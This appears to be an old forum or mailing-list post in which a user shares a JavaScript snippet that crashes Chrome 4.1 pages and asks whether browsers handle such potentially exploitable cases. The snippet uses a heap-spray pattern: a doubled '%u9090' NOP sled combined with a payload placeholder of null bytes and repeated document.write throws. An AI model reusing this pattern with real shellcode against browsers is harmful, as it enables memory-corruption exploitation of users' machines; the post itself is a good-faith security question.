<div><div>Hi</div><div><br></div><div>I have one doubt about javascript that does malicious things. Consider following javascript.</div><div><br></div><div><script language="JavaScript"></div><div> var n=unescape("%u9090");</div>
<div> var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000");</div>
<div> for(var i=0;i<64;i++){</div><div> n=n+n;</div><div> document.write('<script>throw n+s;</scr'+'ipt>');</div><div> }</div><div></script></div><div><br></div><div>
Above code causes exception and there by causing crash. Though Chrome doesnt close. I am not sure what this scrpt does, but i think this is something to do with 'throw' in JavaScript.</div><div>Maybe something to do with overflow.</div>
<div>My doubt is,</div><div><br></div><div>Is there any kind of handling done for above scenario which are potential for hacking ?</div><div><br></div><div>I have Chrome 4.1.249.1045 (42898) on which above script crashes Chrome page.</div>
<div><br></div></div>